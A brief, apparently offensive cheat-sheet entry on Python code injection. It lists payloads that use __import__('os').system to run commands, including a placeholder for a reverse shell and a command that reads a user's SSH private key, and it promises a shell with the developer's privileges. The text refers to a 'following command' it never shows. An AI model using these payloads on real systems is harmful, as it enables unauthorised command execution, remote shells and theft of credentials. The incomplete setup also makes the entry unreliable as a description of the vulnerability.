Python Code Injection

Suppose that you have the following command.

You may be able to insert the following payloads.

# Code execution
__import__('os').system('id')
__import__('os').system('reverse shell command,etc...')
# or sensitive information leakage
__import__('os').system('cat /home/developer/.ssh/id_rsa')

Running the reverse shell command through this code execution gives you a shell with the developer's privileges.
